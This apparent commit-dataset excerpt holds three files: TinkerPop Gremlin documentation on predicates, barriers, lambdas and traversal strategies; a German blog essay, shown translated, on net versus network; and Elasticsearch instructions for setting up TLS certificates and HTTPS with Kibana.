A `P` is a predicate of the form `Function<Object,Boolean>`. That is, given some object, return true or false. The provided predicates are outlined in the table below and are used in various steps such as <<has-step,`has()`>>-step, <<where-step,`where()`>>-step, <<is-step,`is()`>>-step, etc.

[width="100%",cols="3,15",options="header"]
|=========================================================
| Predicate | Description
| `eq(object)` | Is the incoming object equal to the provided object?
| `neq(object)` | Is the incoming object not equal to the provided object?
| `lt(number)` | Is the incoming number less than the provided number?
| `lte(number)` | Is the incoming number less than or equal to the provided number?
| `gt(number)` | Is the incoming number greater than the provided number?
| `gte(number)` | Is the incoming number greater than or equal to the provided number?
| `inside(number,number)` | Is the incoming number greater than the first provided number and less than the second?
| `outside(number,number)` | Is the incoming number less than the first provided number or greater than the second?
| `between(number,number)` | Is the incoming number greater than or equal to the first provided number and less than the second?
| `within(objects...)` | Is the incoming object in the array of provided objects?
| `without(objects...)` | Is the incoming object not in the array of the provided objects?
|=========================================================

[gremlin-groovy]
----
eq(2)
not(neq(2)) <1>
not(within('a','b','c'))
not(within('a','b','c')).test('d') <2>
not(within('a','b','c')).test('a')
within(1,2,3).and(not(eq(2))).test(3) <3>
inside(1,4).or(eq(5)).test(3) <4>
inside(1,4).or(eq(5)).test(5)
between(1,2) <5>
not(between(1,2))
----

<1> The `not()` of a `P`-predicate is another `P`-predicate.
<2> `P`-predicates are arguments to various steps which internally `test()` the incoming value.
<3> `P`-predicates can be and'd together.
<4> `P`-predicates can be or'd together.
<5> `and()` is a `P`-predicate and thus, a `P`-predicate can be composed of multiple `P`-predicates.

Finally, note that <<where-step,`where()`>>-step takes a `P<String>`. The provided string value refers to a variable binding, not to the explicit string value.

[gremlin-groovy,modern]
----
g.V().as('a').both().both().as('b').count()
g.V().as('a').both().both().as('b').where('a',neq('b')).count()
----

NOTE: It is possible for vendors and users to extend `P` and provide new predicates. For instance, a `regex(pattern)` could be a vendor-specific `P`.

[[a-note-on-barrier-steps]]
A Note on Barrier Steps
-----------------------

image:barrier.png[width=165,float=right] Gremlin is primarily a link:http://en.wikipedia.org/wiki/Lazy_evaluation[lazy], stream processing language. This means that Gremlin fully processes (to the best of its abilities) any traversers currently in the traversal pipeline before getting more data from the start/head of the traversal. However, there are numerous situations in which a completely lazy computation is not possible (or impractical). When a computation is not lazy, a "barrier step" exists. There are three types of barriers (a short sketch follows the list):

 . `CollectingBarrierStep`: All of the traversers prior to the step are put into a collection and then processed in some way (e.g. ordered) prior to the collection being "drained" one-by-one to the next step. Examples include: <<order-step,`order()`>>, <<sample-step,`sample()`>>, <<aggregate-step,`aggregate()`>>, <<barrier-step,`barrier()`>>.
 . `ReducingBarrierStep`: All of the traversers prior to the step are processed by a reduce function and once all the previous traversers are processed, a single "reduced value" traverser is emitted to the next step. Examples include: <<fold-step,`fold()`>>, <<count-step,`count()`>>, <<sum-step,`sum()`>>, <<max-step,`max()`>>, <<min-step,`min()`>>.
 . `SupplyingBarrierStep`: All of the traversers prior to the step are iterated (no processing) and then some provided supplier yields a single traverser to continue to the next step. Examples include: <<cap-step,`cap()`>>.
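The difference between lazy streaming and a barrier can be observed directly in the console; a minimal sketch (assuming the modern toy graph, with `order()` and `fold()` chosen only as representative barriers):

[gremlin-groovy,modern]
----
g.V().values('name') // lazy: names stream out one-by-one
g.V().values('name').order() // CollectingBarrierStep: all names are collected and sorted before being drained
g.V().values('name').fold() // ReducingBarrierStep: a single traverser carrying one List is emitted
----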
In Gremlin OLAP (see <<traversalvertexprogram,`TraversalVertexProgram`>>), a barrier is introduced at the end of every <<vertex-steps,adjacent vertex step>>. This means that the traversal does its best to compute as much as possible at the current, local vertex. What it can't compute without referencing an adjacent vertex is aggregated into a barrier collection. When there are no more traversers at the local vertex, the barriered traversers are the messages that are propagated to remote vertices for further processing.

[[a-note-on-lambdas]]
A Note On Lambdas
-----------------

image:lambda.png[width=150,float=right] A link:http://en.wikipedia.org/wiki/Anonymous_function[lambda] is a function that can be referenced by software and thus, passed around like any other piece of data. In Gremlin, lambdas make it possible to generalize the behavior of a step such that custom steps can be created (on-the-fly) by the user. However, it is advised to avoid using lambdas if possible.

[gremlin-groovy,modern]
----
g.V().filter{it.get().value('name') == 'marko'}.
 flatMap{it.get().vertices(OUT,'created')}.
 map {it.get().value('name')} <1>
g.V().has('name','marko').out('created').values('name') <2>
----

<1> A lambda-rich Gremlin traversal which should and can be avoided. (*bad*)
<2> The same traversal (result), but without using lambdas. (*good*)

Gremlin attempts to provide the user a comprehensive collection of steps in the hopes that the user will never need to leverage a lambda in practice. It is advised that users leverage a lambda only if there is no corresponding lambda-less step that encompasses the desired functionality. The reason is that lambdas cannot be optimized by Gremlin's compiler strategies as they cannot be programmatically inspected (see <<traversalstrategy,traversal strategies>>).

In many situations where a lambda could be used, either a corresponding step exists or a traversal can be provided in its place.
A `TraversalLambda` behaves like a typical lambda, but it can be optimized and it yields less objects than the corresponding pure-lambda form.\n\n[gremlin-groovy,modern]\n----\ng.V().out().out().path().by {it.value('name')}.\n by {it.value('name')}.\n by {g.V(it).in('created').values('name').fold().next()} <1>\ng.V().out().out().path().by('name').\n by('name').\n by(__.in('created').values('name').fold()) <2>\n----\n\n<1> The length-3 paths have each of their objects transformed by a lambda. (*bad*)\n<2> The length-3 paths have their objects transformed by a lambda-less step and a traversal lambda. (*good*)\n\n[[traversalstrategy]]\nTraversalStrategy\n-----------------\n\nimage:traversal-strategy.png[width=125,float=right] A `TraversalStrategy` can analyze a `Traversal` and mutate the traversal as it deems fit. This is useful in multiple situations:\n\n * There is an application-level feature that can be embedded into the traversal logic (*decoration*).\n * There is a more efficient way to express the traversal at the TinkerPop3 level (*optimization*).\n * There is a more efficient way to express the traversal at the graph vendor level (*vendor optimization*).\n * There are are some final adjustments required before executing the traversal (*finalization*).\n * There are certain traversals that are not legal for the application or traversal engine (*verification*).\n\nA simple `OptimizationStrategy` is the `IdentityRemovalStrategy`.\n\n[source,java]\n----\npublic final class IdentityRemovalStrategy extends AbstractTraversalStrategy<TraversalStrategy.OptimizationStrategy> implements TraversalStrategy.OptimizationStrategy {\n\n private static final IdentityRemovalStrategy INSTANCE = new IdentityRemovalStrategy();\n\n private IdentityRemovalStrategy() {\n }\n\n @Override\n public void apply(final Traversal.Admin<?, ?> traversal) {\n if (!TraversalHelper.hasStepOfClass(IdentityStep.class, traversal))\n return;\n\n TraversalHelper.getStepsOfClass(IdentityStep.class, traversal).stream().forEach(identityStep -> {\n final Step<?, ?> previousStep = identityStep.getPreviousStep();\n if (!(previousStep instanceof EmptyStep) || identityStep.getLabels().isEmpty()) {\n ((IdentityStep<?>) identityStep).getLabels().forEach(previousStep::addLabel);\n traversal.removeStep(identityStep);\n }\n });\n }\n\n public static IdentityRemovalStrategy instance() {\n return INSTANCE;\n }\n}\n----\n\nThis strategy simply removes any `IdentityStep` steps in the Traversal as `aStep().identity().identity().bStep()` is equivalent to `aStep().bStep()`. For those traversal strategies that require other strategies to execute prior or post to the strategy, then the following two methods can be defined in `TraversalStrategy` (with defaults being an empty set). If the `TraversalStrategy` is in a particular traversal category (i.e. decoration, optimization, vendor-optimization, finalization, or verification), then priors and posts are only possible within the category.\n\n[source,java]\npublic Set<Class<? extends S>> applyPrior();\npublic Set<Class<? extends S>> applyPost();\n\nIMPORTANT: `TraversalStrategy` categories are sorted within their category and the categories are then executed in the following order: decoration, optimization, finalization, and verification. 
If a designed strategy does not fit cleanly into these categories, then it can implement `TraversalStrategy` and its prior and posts can reference strategies within any category.\n\nAn example of a `VendorOptimizationStrategy` is provided below.\n\n[source,groovy]\ng.V().has('name','marko')\n\nThe expression above can be executed in a `O(|V|)` or `O(log(|V|)` fashion in <<tinkergraph-gremlin,TinkerGraph>> depending on whether there is or is not an index defined for \"name.\"\n\n[source,java]\n----\npublic final class TinkerGraphStepStrategy extends AbstractTraversalStrategy<TraversalStrategy.VendorOptimizationStrategy> implements TraversalStrategy.VendorOptimizationStrategy {\n\n private static final TinkerGraphStepStrategy INSTANCE = new TinkerGraphStepStrategy();\n\n private TinkerGraphStepStrategy() {\n }\n\n @Override\n public void apply(final Traversal.Admin<?, ?> traversal) {\n if (traversal.getEngine().isComputer())\n return;\n\n final Step<?, ?> startStep = traversal.getStartStep();\n if (startStep instanceof GraphStep) {\n final GraphStep<?> originalGraphStep = (GraphStep) startStep;\n final TinkerGraphStep<?> tinkerGraphStep = new TinkerGraphStep<>(originalGraphStep);\n TraversalHelper.replaceStep(startStep, (Step) tinkerGraphStep, traversal);\n\n Step<?, ?> currentStep = tinkerGraphStep.getNextStep();\n while (currentStep instanceof HasContainerHolder) {\n ((HasContainerHolder) currentStep).getHasContainers().forEach(tinkerGraphStep::addHasContainer);\n currentStep.getLabels().forEach(tinkerGraphStep::addLabel);\n traversal.removeStep(currentStep);\n currentStep = currentStep.getNextStep();\n }\n }\n }\n\n public static TinkerGraphStepStrategy instance() {\n return INSTANCE;\n }\n}\n----\n\nThe traversal is redefined by simply taking a chain of `has()`-steps after `g.V()` (`TinkerGraphStep`) and providing them to `TinkerGraphStep`. Then its up to `TinkerGraphStep` to determine if an appropriate index exists. In the code below, review the `vertices()` method and note how if an index exists, for a particular `HasContainer`, then that index is first queried before the remaining `HasContainer` filters are serially applied. Given that the strategy uses non-TinkerPop3 provided steps, it should go into the `VendorOptimizationStrategy` category to ensure the added step does not corrupt the `OptimizationStrategy` strategies.\n\n[gremlin-groovy,modern]\n----\nt = g.V().has('name','marko'); null\nt.toString()\nt.iterate(); null\nt.toString()\n----\n\nCAUTION: The reason that `OptimizationStrategy` and `VendorOptimizationStrategy` are two different categories is that optimization strategies should only rewrite the traversal using TinkerPop3 steps. This ensures that the optimizations executed at the end of the optimization strategy round are TinkerPop3 compliant. From there, vendor optimizations can analyze the traversal and rewrite the traversal as desired using vendor specific steps (e.g. replacing `GraphStep.HasStep...HasStep` with `TinkerGraphStep`). If vendor's optimizations use vendor-specific steps and implement `OptimizationStrategy`, then other TinkerPop3 optimizations may fail to optimize the traversal or mis-understand the vendor-specific step behaviors (e.g. `VendorVertexStep extends VertexStep`) and yield incorrect semantics.\n\nA collection of useful `DecorationStrategy` strategies are provided with TinkerPop3 and are generally useful to end-users. 
The following sub-sections detail these strategies:\n\nElementIdStrategy\n~~~~~~~~~~~~~~~~~\n\n`ElementIdStrategy` provides control over element identifiers. Some Graph implementations, such as TinkerGraph, allow specification of custom identifiers when creating elements:\n\n[gremlin-groovy]\n----\ng = TinkerGraph.open().traversal()\nv = g.addV().property(id,'42a').next()\ng.V('42a')\n----\n\nOther `Graph` implementations, such as Neo4j, generate element identifiers automatically and cannot be assigned. As a helper, `ElementIdStrategy` can be used to make identifier assignment possible by using vertex and edge indicies under the hood.\n\n[gremlin-groovy]\n----\ngraph = Neo4jGraph.open('\/tmp\/neo4j')\nstrategy = ElementIdStrategy.build().create()\ng = GraphTraversalSource.build().with(strategy).create(graph)\ng.addV().property(id, '42a').id()\n----\n\nIMPORTANT: The key that is used to store the assigned identifier should be indexed in the underlying graph database. If it is not indexed, then lookups for the elements that use these identifiers will perform a linear scan.\n\nEventStrategy\n~~~~~~~~~~~~~\n\nThe purpose of the `EventStrategy` is to raise events to one or more `MutationListener` objects as changes to the underlying `Graph` occur within a `Traversal`. Such a strategy is useful for logging changes, triggering certain actions based on change, or any application that needs notification of some mutating operation during a `Traversal`. If the transaction is rolled back, the event queue is reset.\n\nThe following events are raised to the `MutationListener`:\n\n* New vertex\n* New edge\n* Vertex property changed\n* Edge property changed\n* Vertex property removed\n* Edge property removed\n* Vertex removed\n* Edge removed\n\nTo start processing events from a `Traversal` first implement the `MutationListener` interface. An example of this implementation is the `ConsoleMutationListener` which writes output to the console for each event. The following console session displays the basic usage:\n\n[gremlin-groovy]\n----\ngraph = TinkerFactory.createModern()\nl = new ConsoleMutationListener(graph)\nstrategy = EventStrategy.build().addListener(l).create()\ng = GraphTraversalSource.build().with(strategy).create(graph)\ng.addV('name','stephen')\ng.E().drop()\n----\n\nBy default, the `EventStrategy` is configured with an `EventQueue` that raises events as they occur within execution of a `Step`. As such, the final line of Gremlin execution that drops all edges shows a bit of an inconsistent count, where the removed edge count is accounted for after the event is raised. The strategy can also be configured with a `TransactionalEventQueue` that captures the changes within a transaction and does not allow them to fire until the transaction is committed.\n\nCAUTION: `EventStrategy` is not meant for usage in tracking global mutations across separate processes. In other words, a mutation in one JVM process is not raised as an event in a different JVM process. In addition, events are not raised when mutations occur outside of the `Traversal` context.\n\nPartitionStrategy\n~~~~~~~~~~~~~~~~~\n\nimage::partition-graph.png[width=325]\n\n`PartitionStrategy` partitions the vertices and edges of a graph into `String` named partitions (i.e. buckets, subgraphs, etc.). The idea behind `PartitionStrategy` is presented in the image above where each element is in a single partition (represented by its color). Partitions can be read from, written to, and linked\/joined by edges that span one or two partitions (e.g. 
a tail vertex in one partition and a head vertex in another).\n\nThere are three primary configurations in `PartitionStrategy`:\n\n. Partition Key - The property key that denotes a String value representing a partition.\n. Write Partition - A `String` denoting what partition all future written elements will be in.\n. Read Partitions - A `Set<String>` of partitions that can be read from.\n\nThe best way to understand `PartitionStrategy` is via example.\n\n[gremlin-groovy]\n----\ngraph = TinkerFactory.createModern()\nstrategyA = PartitionStrategy.build().partitionKey(\"_partition\").writePartition(\"a\").addReadPartition(\"a\").create()\nstrategyB = PartitionStrategy.build().partitionKey(\"_partition\").writePartition(\"b\").addReadPartition(\"b\").create()\ngA = GraphTraversalSource.build().with(strategyA).create(graph)\ngA.addV() \/\/ this vertex has a property of {_partition:\"a\"}\ngB = GraphTraversalSource.build().with(strategyB).create(graph)\ngB.addV() \/\/ this vertex has a property of {_partition:\"b\"}\ngA.V()\ngB.V()\n----\n\nPartitions may also extend to `VertexProperty` elements if the `Graph` can support meta-properties and if the `includeMetaProperties` value is set to `true` when the `PartitionStrategy` is built. The `partitionKey` will be stored in the meta-properties of the `VertexProperty` and blind the traversal to those properties. Please note that the `VertexProperty` will only be hidden by way of the `Traversal` itself. For example, calling `Vertex.property(k)` bypasses the context of the `PartitionStrategy` and will thus allow all properties to be accessed.\n\nBy writing elements to particular partitions and then restricting read partitions, the developer is able to create multiple graphs within a single address space. Moreover, by supporting references between partitions, it is possible to merge those multiple graphs (i.e. join partitions).\n\nReadOnlyStrategy\n~~~~~~~~~~~~~~~~\n\n`ReadOnlyStrategy` is largely self-explanatory. 
ReadOnlyStrategy\n~~~~~~~~~~~~~~~~\n\n`ReadOnlyStrategy` is largely self-explanatory. A `Traversal` that has this strategy applied will throw an `IllegalStateException` if the `Traversal` contains any mutating steps.\n\nSubgraphStrategy\n~~~~~~~~~~~~~~~~\n\n`SubgraphStrategy` is quite similar to `PartitionStrategy` in that it restricts a `Traversal` to certain vertices and edges as determined by a `Traversal` criterion defined individually for each.\n\n[gremlin-groovy]\n----\ngraph = TinkerFactory.createModern()\nstrategy = SubgraphStrategy.build().edgeCriterion(hasId(8,9,10)).create()\ng = GraphTraversalSource.build().with(strategy).create(graph)\ng.V() \/\/ shows all vertices, since no vertex filter was specified\ng.E() \/\/ shows only the edges defined in the edgeCriterion\n----\n\nThis strategy is implemented such that both vertices attached to an `Edge` must satisfy the `vertexCriterion` (if present) in order for the `Edge` to be considered part of the subgraph.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e7b54eb31aad3d5a49f66ea553a5eeeef6d0ccdd","subject":"Update 2017-05-04-Netz-und-Netzwerk.adoc","message":"Update 2017-05-04-Netz-und-Netzwerk.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-05-04-Netz-und-Netzwerk.adoc","new_file":"_posts\/2017-05-04-Netz-und-Netzwerk.adoc","new_contents":"# Netz und Netzwerk\n:hp-tags: netz, netzwerk\n:published_at: 2017-05-04\n\nBELATED CONTRIBUTION TO THE BLOG PARADE [<<footnote-1>>]\n\nLinguistic habits rarely match conceptual wishes; the following word usage may be unusual.\n\n\n### Net\/network structure\n\nThe network is interconnection in a double sense [<<footnote-2>>], distinguishable into a structure side and a process side: the structure side denotes the conditions of interconnection, here: the network structure; the process side denotes the net structure that executes itself through interconnection, here: the net.\n\nObservation of the network suffers from a blurring problem, since every structure is observable only in its processing, and every process becomes recognizable as a process only as the execution of a structure. Either side is thus observable only by presupposing the other. Whoever observes the net (that is: watches what the net \u00bbdoes\u00ab, how it \u00bbbehaves\u00ab, in other words: how it processes) presupposes a network structure executing itself within it, against which changes of the net can be measured; what is watched is the change of structural moments, that is, the shifting of structural variables (structure-indifferent changes of the net) as well as the development of the structural constants by which the net can be classified as a net; only in this way do failures and defects, destruction, construction, etc. become visible. (The structure thus gives information \u2013 not only, but also \u2013 about the function.) Conversely, the net structure can be recognized only in the actualization of the structure in its execution by the process, and a network structure only in the nets that realize themselves. For that it must be settled what counts as a net within the network, from which the network structure can then be worked out.\n\nIn its entirety, the network cannot be observed in sharp focus.\n\n\n### The internet as net\n\n
The internet can be described either as a net or as a network. I argue for the latter, after first problematizing the former:\n\nThe internet has no structure of its own; a network structure processes in the internet in a particular (but structurally variable) way: digitally. One holds conversations via chatrooms or video telephony, maintains friendships via internet portals, or reads blogs instead of magazines; it is a net within a network: it is (for example) a mass medium among mass media, under changed physical (but only physical) conditions. From this perspective the interconnection techniques of the internet are primitive compensation: interconnection under aggravated conditions, the internet occasioned by carrying interconnection (and that means here above all: the conditions for communication) forward despite restrictions. [Cf. compensation and poetic reading] Then it remains questionable why digitality continues to be used even where the restrictions are absent: why chat when one could meet? why \u2026\n\nOne suspects delusion and fears decline. (\u00bbdigital bewitchment\u00ab, so to speak: \u00bbthe devil does not have much time\u00ab [BL], so he quickly invented the internet! \u2026) This\n\n\n### The internet as network\n\nThe internet as network is distinguished by the minimality of its network structure, that is, of the conditions under which interconnection takes place; the minimal condition of internet interconnection is (besides digitality): a connection requires at least two addresses that are connected; or: an address requires at least one counter-address with which it is connected. The network internet keeps one rule alive: connect! The process side is thereby left indeterminate; the process can itself form substructures that are processed in turn, under the single condition that the processing of the substructure fulfils the network structure: think of platforms, which form their own .\n\nInsofar as the network conditions of the internet are fundamental to every network, other network structures can also process themselves within the network internet: e.g. mass media; these too work with the linking of addresses, only mass-media network structures are more complicated (and more rigid): certain addresses are privileged as central addresses and non-central addresses are restricted, whereby non-central addresses are ignored in concreto and treated only as abstract addresses: the reader, the listener, the viewer vs. the ARD, the ZEIT, the journalist, etc. If the relation _non-central address -> central address_ is qualitative, the reverse relation _central address -> non-central address_ is above all quantitative: who watches does not count; only that enough must watch.\n\n
This can also be processed in the internet, because despite the rigorous address hierarchy and one-sidedness it can be digitized without difficulty, while at the same time the network structure of the internet keeps processing too. This tolerability, however, is one-sided, for the internet treats addresses as addresses, and a newspaper, too, has no more than one of those at its disposal; against the \u00bbproblems\u00ab of the internet, this side then proposes above all external regulation: (mass-media) preservation of structure through the enlightenment of people or the integration of familiar selection mechanisms: exclusion, hierarchization of attention\u2026 For the internet, however, a familiar principle of fascination holds: put a pedestal with a red button in the L\u00fcneburg Heath, and sooner or later someone will come by and press it; put the same pedestal on Alexanderplatz, and the waiting time shortens; and put 100 such pedestals on the Alex, and you won't be done setting them up before the first presser arrives\u2026\n\n\n\nhas changed, but rather the relation as such: production\u2013publication\u2013reception; which is precisely what did not change in the shift from handwritten to letterpress publication.\n\n\nMass-media linking also works with addresses, but through very rigid (because complicated) linking techniques and the privileging of individual addresses (one-to-many, many-to-one) it can ignore the addresses in concreto and work with abstract addresses: the ARD, but \u203athe viewers of the ARD\u2039 \u2013 the ZEIT, but \u203athe readers of the ZEIT\u2039 \u2026 The abstract addresses then act only quantitatively: enough readers, enough viewers are needed; who goes and who comes does not matter. The internet cannot form these abstract addresses, precisely because it is not a net within a network: an abstract address cannot be dialled; only concrete addresses are admitted, and every address is (equally) an address; the ZEIT cannot force a retweet, but a 13-year-old schoolgirl from a Saxon village can. That the internet is misunderstood mass-medially is probably often because it stands athwart the mass media: they try to produce the network mass-medium via the network internet; that works only to a limited extent, provided all non-privileged addresses play along; the internet offers no special addresses, the means of publication are (at first) equally distributed, and since non-privileged addresses predominate in the internet, refusal (in the extreme: \u00bbtrolling\u00ab) is highly probable. (And how does mass-media logic react to this conflict?: it demands the transfer of its criteria of privileging and selection: the problem with the internet would then lie in the flexibility of the unconditionality of address formation (anyone, as many as they like, under any name, etc.) and of their interconnection; mass-medially, the problem of the internet is the internet. 
(So one wants a digital mass medium, and at the same time constantly thinks that that is what one is dealing with.)\n\n\nThe internet is shaped by the binding of its interconnection structures to existing net mechanics (that is, the regulation of address allocation and address interconnection), as, conversely, by the binding of the net processes \u2013 how addresses are allocated is not independent of the platforms\n\nThe internet is not merely a structure. This is due to the internet's double elementary dependence: the internet is structure-dependent on addresses and process-dependent on the interconnection of addresses. This permits a double freedom: on the one hand it does not matter which addresses are connected, as long as they are connected; on the other hand it does not matter how they are connected, as long as addresses are connected. Interconnection can take place decentrally or centrally, immediately (address\u2013address) or mediately (address via address to address, escalatable to the utmost), minimally or maximally (at least two, open upward); or even all of these side by side. Thus the internet permits mass-media structures to appear, as long as they function on their own terms.\n\n\n____\nRedundancy is the principle of the internet, maintained below the surface. Companies own territories of data lines; routing traffic through them is a marketed service. This archaic infrastructure of territorial division is part of hardly any description of the internet, and rightly so, _for its operations are, on the contrary, characterized by their placelessness_. The storing of data, of text, is today taken over en masse by large companies (the server in one's own living room may count as the exception). Is there a good reason to describe communication, the distribution and storage of text, under the condition of platforms? These services, too, offer the possibility of creating redundancy by copying. 
If we use them correctly, we can forget them.\n\n_It is not about platform neutrality, but about platform indifference._\n____\n\n\nAs a network, the internet is blurred; therein lies its potential: in the fluidity and complexity of interconnection; this is made possible by the stability of its fundamental structural constant: the address; for however complexly and fluidly the internet networks, addresses are always involved; and only by recourse to addresses can interconnection be observed (how else?); the internet itself, however, is not exhausted in its addresses but includes the process side; and precisely this is the novelty that is still largely unexplained:\n\n\n---\n\n[[footnote-1, 1]] [1] The call for the blog parade _Netz und Netzwerk_:\n\n++++\n<blockquote class=\"twitter-tweet\" data-partner=\"tweetdeck\"><p lang=\"de\" dir=\"ltr\">Aufruf zur Blogparade: "Was ist der Unterschied zwischen Netz und Netzwerk?"<br><br>[bis 30.04 hashtag <a href=\"https:\/\/twitter.com\/hashtag\/blgntzwrk?src=hash\">#blgntzwrk<\/a>]<br><br>Bitte RT!<\/p>— Klaus Kusanowsky (@kusanowsky) <a href=\"https:\/\/twitter.com\/kusanowsky\/status\/854803923751890944\">April 19, 2017<\/a><\/blockquote>\n<script async src=\"\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script>\n++++\n\nFor further contributions, see also http:\/\/professio.ifwo.eu[Netz und Netzwerk] by http:\/\/twitter.com\/adloquii[@adloquii] and the https:\/\/colloquium.ifwo.eu\/2017\/04\/30\/netz-und-netzwerk\/[episode of the same name] of his https:\/\/colloquium.ifwo.eu[colloquium podcast] with http:\/\/twitter.com\/christopheus[@christopheus].\n\n[[footnote-2, 2]] [2] Interconnection (\u00bbVernetzung\u00ab) is meant here in the double sense \u2013 thing and process \u2013 carried by the German noun ending -ung; a good example is \u00bbSteuerung\u00ab, which can denote either the steering mechanism or the act of steering.\n\n[[footnote-3, 3]] [3] Whoever renounces ontological reference as a justification of concepts and relies instead on constructive (not constructivist!) methods needs, for the introduction of distinctions and concepts, only their constructibility; a distinction is possible if the distinction can be made; its constructibility then presupposes its (intertemporal and interpersonal) [Not even that is compelling, since a distinction is also constructible if it is constructed, unmediatedly, for one consciousness in one moment. Only then the distinction is person- and context-variant: bound to that consciousness in that moment. I set such cases aside and speak only of communicative distinctions.] reconstruction. [In methodical constructivism this is subsumed under the (there normative) principle of teach-learnability, cf. \u2026]","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"}
{"commit":"785ce7edb856a0a79b25aa14a50cd7182930ea5f","subject":"[DOCS] Add missing SSL settings for Metricbeat (#72987)","message":"[DOCS] Add missing SSL settings for Metricbeat (#72987)\n\n","repos":"robin13\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"x-pack\/docs\/en\/security\/securing-communications\/security-basic-setup-https.asciidoc","new_file":"x-pack\/docs\/en\/security\/securing-communications\/security-basic-setup-https.asciidoc","new_contents":"[[security-basic-setup-https]]\n=== Set up basic security for the Elastic Stack plus secured HTTPS traffic\n++++\n<titleabbrev>Set up basic security plus HTTPS<\/titleabbrev>\n++++\n\nIn a production environment, some {es} features such as tokens and\nAPI keys will be disabled unless you enable TLS on the HTTP layer. This\nadditional layer of security ensures that all communications to and from your\ncluster are secured.\n\nWhen you run the `elasticsearch-certutil` tool in `http` mode, the tool asks\nseveral questions about how you want to generate certificates. While there are\nnumerous options, the following choices result in certificates that should\nwork for most environments.\n\n[[signing-certificates]]\n.Signing certificates\n****\nThe first question that the `elasticsearch-certutil` tool prompts you with is\nwhether you want to generate a Certificate Signing Request (CSR). Answer\n`n` if you want to sign your own certificates, or `y` if you want to sign\ncertificates with a central CA.\n\n[discrete]\n===== Sign your own certificates\n\nIf you want to use the CA that you created when\n<<generate-certificates,Generating the certificate authority>>, answer `n` when\nasked if you want to generate a CSR. You then specify the location of your CA,\nwhich the tool uses to sign and generate a `.p12` certificate. The steps in\nthis procedure follow this workflow.\n\n[discrete]\n===== Sign certificates with a central CA\n\nIf you work in an environment with a central security team, they can likely\ngenerate a certificate for you. Infrastructure within your organization\nmight already be configured to trust an existing CA, so it may be easier\nfor clients to connect to {es} if you use a CSR and send that\nrequest to the team that controls your CA. To use a central CA, answer `y` to\nthe first question.\n****\n\n[[basic-setup-https-prerequisites]]\n==== Prerequisites\n\nComplete all steps in <<security-basic-setup,Set up basic security for the Elastic Stack>>.\n\n[[encrypt-http-communication]]\n==== Encrypt HTTP client communications for {es}\n\n. Stop {es} and {kib} if they are running.\n\n. From the directory where you installed {es}, run the {es}\n HTTP certificate tool to generate a Certificate Signing Request (CSR).\n+\n[source,shell]\n----\n.\/bin\/elasticsearch-certutil http\n----\n+\nThis command generates a `.zip` file that contains certificates and keys\nto use with {es} and {kib}. Each folder contains a `README.txt`\nexplaining how to use these files.\n\n a. When asked if you want to generate a CSR, enter `n`.\n\n b. When asked if you want to use an existing CA, enter `y`.\n\n c. Enter the path to your CA. This is the absolute path to\n the `elastic-stack-ca.p12` file that you generated for your cluster.\n\n d. Enter the password for your CA.\n\n e. 
Enter an expiration value for your certificate. You can enter the\n validity period in years, months, or days. For example, enter `90D` for 90\n days.\n\n f. When asked if you want to generate one certificate per node, enter `y`.\n+\nEach certificate will have its own private key, and will be issued for a\nspecific hostname or IP address.\n\n g. When prompted, enter the name of the first node in your cluster. Use the same node name that you used when <<generate-certificates,generating node certificates>>.\n\n h. Enter all hostnames used to connect to your first node. These hostnames\n will be added as DNS names in the Subject Alternative Name (SAN) field in your certificate.\n+\nList every hostname and variant used to connect to your cluster over HTTPS.\n\n i. Enter the IP addresses that clients can use to connect to your node.\n\n j. Repeat these steps for each additional node in your cluster.\n\n. After generating a certificate for each of your nodes, enter a password for\n your private key when prompted.\n\n. Unzip the generated `elasticsearch-ssl-http.zip` file. This compressed file\n contains one directory each for {es} and {kib}.\n+\n--\n[source,txt]\n----\n\/elasticsearch\n|_ README.txt\n|_ http.p12\n|_ sample-elasticsearch.yml\n----\n\n[source,txt]\n----\n\/kibana\n|_ README.txt\n|_ elasticsearch-ca.pem\n|_ sample-kibana.yml\n----\n--\n\n. Copy the relevant `http.p12` certificate to the `ES_PATH_CONF` directory on each node.\n\n. On each node, edit the `elasticsearch.yml` file to enable HTTPS security and\n specify the location of the `http.p12` security certificate.\n+\n[source,yaml]\n----\nxpack.security.http.ssl.enabled: true\nxpack.security.http.ssl.keystore.path: http.p12\n----\n\n. Add the password for your private key to the secure settings in {es}.\n+\n[source,shell]\n----\n.\/bin\/elasticsearch-keystore add xpack.security.http.ssl.keystore.secure_password\n----\n\n. Start {es}.\n\n**Next**: <<encrypt-kibana-http,Encrypt HTTP client communications for {kib}>>\n\n[[encrypt-kibana-http]]\n==== Encrypt HTTP client communications for {kib}\n\nBrowsers send traffic to {kib} and {kib} sends traffic to {es}.\nThese communication channels are configured separately to use TLS. You encrypt\ntraffic between your browser and {kib}, and then encrypt traffic between\n{kib} and {es}.\n\n[[encrypt-kibana-elasticsearch]]\n===== Encrypt traffic between {kib} and {es}\n\nWhen you ran the `elasticsearch-certutil` tool with the `http` option, it\ncreated a `\/kibana` directory containing an `elasticsearch-ca.pem` file. You\nuse this file to configure {kib} to trust the {es} CA for the HTTP\nlayer.\n\n1. Copy the `elasticsearch-ca.pem` file to the {kib} configuration directory,\nas defined by the `KBN_PATH_CONF` path.\n\n2. Open `kibana.yml` and add the following line to specify the location of the\nsecurity certificate for the HTTP layer.\n+\n[source,yaml]\n----\nelasticsearch.ssl.certificateAuthorities: KBN_PATH_CONF\/elasticsearch-ca.pem\n----\n\n3. Add the following line to specify the HTTPS URL for your {es}\ncluster.\n+\n[source,yaml]\n----\nelasticsearch.hosts: https:\/\/<your_elasticsearch_host>.com:9200\n----\n\n4. Restart {kib}.\n\n.Connect to a secure monitoring cluster\n****\nIf the Elastic monitoring features are enabled and you configured a separate\n{es} monitoring cluster, you can also configure {kib} to connect to\nthe monitoring cluster via HTTPS. The steps are the same, but each setting is\nprefixed by `monitoring`. 
